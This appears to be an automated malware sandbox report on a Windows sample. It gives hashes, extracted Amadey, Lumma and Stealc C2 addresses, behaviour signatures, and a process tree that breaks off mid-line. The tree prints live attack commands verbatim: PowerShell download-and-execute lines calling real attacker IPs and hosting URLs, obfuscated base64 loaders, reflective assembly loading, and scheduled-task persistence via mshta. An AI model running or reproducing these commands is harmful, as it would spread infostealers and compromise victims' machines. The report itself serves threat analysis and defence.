Analysis

  • max time kernel
    148s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 14:03

General

  • Target

    2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    84c300a105cb5e140c8c91e2c6ead590

  • SHA1

    5bd18b75d71b2824913a508ce28db8d4c2a936b9

  • SHA256

    edfb2e4f23a9c490eb887fe69d57aab4dea230d0b76e3b1c95babb559c36fa58

  • SHA512

    eec8f1abe337ec6e09cdf613c015a1cf84a58217f063d884e4a4ef8a925f17f8c7c869ce81e081e81382cb5860cdc46f1b4cb96923b97c0d41e76dd98d99f106

  • SSDEEP

    24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:oTvC/MTQYxsWR7a06

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://advennture.top/GKsiio

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://targett.top/dsANGt

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rodformi.run/aUosoz

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 12 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 17 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 42 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of FindShellTrayWindow 54 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn pniJfmaa3Ge /tr "mshta C:\Users\Admin\AppData\Local\Temp\RfHpRDOV6.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2120
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn pniJfmaa3Ge /tr "mshta C:\Users\Admin\AppData\Local\Temp\RfHpRDOV6.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2356
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\RfHpRDOV6.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2400
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P6YIFT5ZWGPPEILY8NTJMNGV7PVVLOZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Users\Admin\AppData\Local\TempP6YIFT5ZWGPPEILY8NTJMNGV7PVVLOZJ.EXE
          "C:\Users\Admin\AppData\Local\TempP6YIFT5ZWGPPEILY8NTJMNGV7PVVLOZJ.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2476
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2640
            • C:\Users\Admin\AppData\Local\Temp\10381740101\2cc3887da7.exe
              "C:\Users\Admin\AppData\Local\Temp\10381740101\2cc3887da7.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1244
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1244 -s 64
                7⤵
                • Loads dropped DLL
                PID:2940
            • C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe
              "C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:1704
              • C:\Windows\system32\cmd.exe
                cmd.exe /c 67e8f4de3ad1d.vbs
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1856
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2448
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBi@G8@YQBl@GU@c@Bk@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1848
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.boaeepd/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                      10⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2876
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1480
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2676
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z